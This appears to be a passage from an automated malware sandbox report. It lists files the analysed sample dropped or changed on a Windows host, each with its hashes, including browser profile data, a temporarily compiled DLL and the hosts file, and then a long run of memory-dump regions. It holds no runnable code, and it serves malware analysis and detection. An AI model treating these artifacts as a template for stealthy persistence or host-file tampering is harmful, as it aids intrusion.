                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                Filesize

                                                5KB

                                                MD5

                                                89fb1ce7d5da5a287b0b6312c1732145

                                                SHA1

                                                8521d22feaf0941708c9069e8d8fb35d19ba8050

                                                SHA256

                                                229b7d58941c09d0e389f61ec671868e0d8a02e0d793dd8314a65e236ddc52c8

                                                SHA512

                                                c2284ff389532f01fbeb4e8fdd15f6de540a7be2bd0dc537f36a06fae112bba672ca697003005600e1955b1ce95387397606e9e6a012ff6bae55eaf22c34ae4b

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                Filesize

                                                6KB

                                                MD5

                                                73ca0a956c280b15fd59bf5dd14e16a4

                                                SHA1

                                                1c5460da7d127d146083229a5792fcd9f47833b7

                                                SHA256

                                                0d63c6d274f1e4dd296af3e473cc1e04c24cbb2270e5a586d244ea8aafb400a3

                                                SHA512

                                                a7ed5eeaa824804e90faa7c205ce62ce0bd9b85b856e692f5918deac879a8f7ce7dd9e09ecbd9f8f7057a54a300cd1f025d7b222ae45f589d7fb9726866c9710

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                Filesize

                                                16B

                                                MD5

                                                6752a1d65b201c13b62ea44016eb221f

                                                SHA1

                                                58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                SHA256

                                                0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                SHA512

                                                9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                Filesize

                                                10KB

                                                MD5

                                                be057a70454cecf3815b304d2c83dcc4

                                                SHA1

                                                12b7d6fdd1fa161e61c29d146582b56954030ad8

                                                SHA256

                                                7a13c7c67fad315ecd0b480bf1ced4fef7530e2d6531d22abaf0c413659b8862

                                                SHA512

                                                2e855ae46c5a4362f6dfa8ecb300ac97ff4501b6150788616e4aca484b1278d258e783790dc4eebf00413e2483d58eb989d1d5639a22fe7d1c41ddb34a9ea2a0

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                Filesize

                                                10KB

                                                MD5

                                                cee1d212d1ea4eeb1fe27c76fe4096a2

                                                SHA1

                                                38a4bd9b93e72d536d4b687d7d23e315169aeeae

                                                SHA256

                                                586dd43777c31e778d6e98cc401064e22e38598744e241f994158625709cf850

                                                SHA512

                                                0a9e4994bf3a3abacba68290a9aa631aa8f0a16d3562fa8e1dc81eab81efdf3e44a7698e4aa3cebbe4e7bc5a27999983441f83e84667d7625ec6a13d2c9a5246

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                Filesize

                                                944B

                                                MD5

                                                6d42b6da621e8df5674e26b799c8e2aa

                                                SHA1

                                                ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                                SHA256

                                                5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                                SHA512

                                                53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                Filesize

                                                944B

                                                MD5

                                                a2c8179aaa149c0b9791b73ce44c04d1

                                                SHA1

                                                703361b0d43ec7f669304e7c0ffbbfdeb1e484ff

                                                SHA256

                                                c1d30342a40a2b6e7553da30ceb85754d33820f6fbb3bbbed1ceb30d6390de4a

                                                SHA512

                                                2e201dd457d055baad86f68c15bcc7beb48d6dc2ffc10db7f304eb93f697e7b45991cbde857d25da2c9c60c23f3e13df8b5ed5809c1753737a23096e296cc9e3

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Temp\GLFG23QQpE\Display (1).png
                                                Filesize

                                                47KB

                                                MD5

                                                814fcdd3bec0fee2d7e6b88ef29dd16b

                                                SHA1

                                                913aaad22b360e3c2afac855e590354af36ed50c

                                                SHA256

                                                519eeb608fd5876d3a0ecad6a7907a9ab0ecccc3e7cb103e4f00142299cc4bae

                                                SHA512

                                                e737edb3aaf1be6f906d4b34ea9fb42aefa6ecfcbfc3db827cb21cd8c7abdf8c88022d8a982989e159674f9bbabe117059054a1aaf13bfaca8f1de1eb82abbe1

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Temp\RESEBB8.tmp
                                                Filesize

                                                1KB

                                                MD5

                                                4869d884cf67e552b0a60524102dc194

                                                SHA1

                                                87766e51148e1a7978082c2852fee97d8ff46ce6

                                                SHA256

                                                4ad89189fbd636bc8da8fe0bfa97ba87b43a7318011d850485525454e60e461f

                                                SHA512

                                                4cf981d2d584c01a91748ee65d44a7145a9ffa86417bf477f651e243da74437f019a379610e87ca88e5ba8d74be9a475833e3039b21aebb5ddfe716c57cba6d3

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_05qzxndu.cuo.ps1
                                                Filesize

                                                60B

                                                MD5

                                                d17fe0a3f47be24a6453e9ef58c94641

                                                SHA1

                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                SHA256

                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                SHA512

                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                Download Submit

                                              • C:\Users\Admin\AppData\Local\Temp\so5f24g4\so5f24g4.dll
                                                Filesize

                                                4KB

                                                MD5

                                                72ddfd72e3f91471b6a4dd026c382953

                                                SHA1

                                                5fcacad30d5d860b84e80fffd03af1ced19d28dd

                                                SHA256

                                                865a0409730962d58b9efcc5aeb604fa3940ef44549d6e8a00f2b9a9dc519128

                                                SHA512

                                                826aedf088b3fff918d067cdb0b591a0cb3beccf28fa55cb416310d91fe418f2c21ce5dc36df18508a7faa774d209c9aba016c6b16f52b152cdb685a9014f6e1

                                                Download Submit

                                              • C:\Users\Admin\Downloads\Unconfirmed 492989.crdownload
                                                Filesize

                                                7.2MB

                                                MD5

                                                550d4c4fc723beba62cafb93ffff6357

                                                SHA1

                                                4c9b51dbc01c69d4b8e2cef3d6a0b12f2824c254

                                                SHA256

                                                a203380c24f97ebad23887025511ffb650e12fd3a70027b541ad46f53827ab90

                                                SHA512

                                                c409e16112adc30d2a36f1fe9d36fc1ef4ed2473dd03c863a1cfc7fa4e0ce6f57fa16057db63df12fcdbb9a3fc5dca0caa4b36c7b1b70f1d6f6729ab092ad3b7

                                                Download Submit

                                              • C:\Users\Admin\Videos\Captures\desktop.ini
                                                Filesize

                                                190B

                                                MD5

                                                b0d27eaec71f1cd73b015f5ceeb15f9d

                                                SHA1

                                                62264f8b5c2f5034a1e4143df6e8c787165fbc2f

                                                SHA256

                                                86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2

                                                SHA512

                                                7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c

                                                Download Submit

                                              • C:\Windows\system32\drivers\etc\hosts
                                                Filesize

                                                2KB

                                                MD5

                                                6e2386469072b80f18d5722d07afdc0b

                                                SHA1

                                                032d13e364833d7276fcab8a5b2759e79182880f

                                                SHA256

                                                ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

                                                SHA512

                                                e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

                                                Download Submit

                                              • \??\c:\Users\Admin\AppData\Local\Temp\so5f24g4\CSC17A35D4ED7074DED8025CC34495EF016.TMP
                                                Filesize

                                                652B

                                                MD5

                                                6866fbf4413c89e38f2015bf8175f642

                                                SHA1

                                                c13333589ff770d1000b270f741ea7515dc68ea1

                                                SHA256

                                                ae8474dca63d047da972a354f071cdf62fa740bb8b8afac90b1407af75cad19f

                                                SHA512

                                                2b199fa0d8a5ab21cf54261b620cdcb142619a3eebfb1dfb4677ddaf788f573df980ab43b45abf74a332f6b97dcb8556251e4fe8e078b0c408a35a23911f01b8

                                                Download Submit

                                              • \??\c:\Users\Admin\AppData\Local\Temp\so5f24g4\so5f24g4.0.cs
                                                Filesize

                                                1004B

                                                MD5

                                                c76055a0388b713a1eabe16130684dc3

                                                SHA1

                                                ee11e84cf41d8a43340f7102e17660072906c402

                                                SHA256

                                                8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                SHA512

                                                22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                Download Submit

                                              • \??\c:\Users\Admin\AppData\Local\Temp\so5f24g4\so5f24g4.cmdline
                                                Filesize

                                                607B

                                                MD5

                                                13d31aad633b62663fca6574ad8f2bfa

                                                SHA1

                                                a63d51ac5a7018f5b7c1b09b7c7efc8852e0e11e

                                                SHA256

                                                ef09e88a9b1ae16557af26aaea393cb72e7976f9727d2275069181c86d73e914

                                                SHA512

                                                d6bb5e516b467560e9f1fd8a10d8e66b694b71b824176701ca1c22075222b48e2dc3aeffcbe23d77e2eeb171f8723633c44ea5e430bebec6396a1a316a5e1061

                                                Download Submit

                                              • memory/5228-154-0x0000028A52B90000-0x0000028A52B98000-memory.dmp

                                                Filesize

                                                32KB

                                                Download

                                              • memory/5244-245-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-258-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-173-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-174-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-177-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-178-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-188-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-197-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-291-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-221-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-222-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-223-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-224-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-225-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-228-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-231-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-232-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-242-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-243-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-244-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-75-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-246-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-247-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-248-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-249-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-250-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-251-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-252-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-253-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-254-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-255-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-256-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-257-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-290-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-259-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-260-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-261-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-262-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-263-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-264-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-265-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-266-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-267-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-268-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-269-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-270-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-271-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-272-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-273-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-274-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-275-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-276-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-277-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-278-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-279-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-280-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-281-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-282-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-283-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-284-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-285-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-286-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-287-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-288-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5244-289-0x0000000001000000-0x0000000001EDE000-memory.dmp

                                                Filesize

                                                14.9MB

                                                Download

                                              • memory/5612-152-0x000001A38DBE0000-0x000001A38E6A1000-memory.dmp

                                                Filesize

                                                10.8MB

                                                Download

                                              • memory/5828-95-0x000001A8E6540000-0x000001A8E6562000-memory.dmp

                                                Filesize

                                                136KB

                                                Download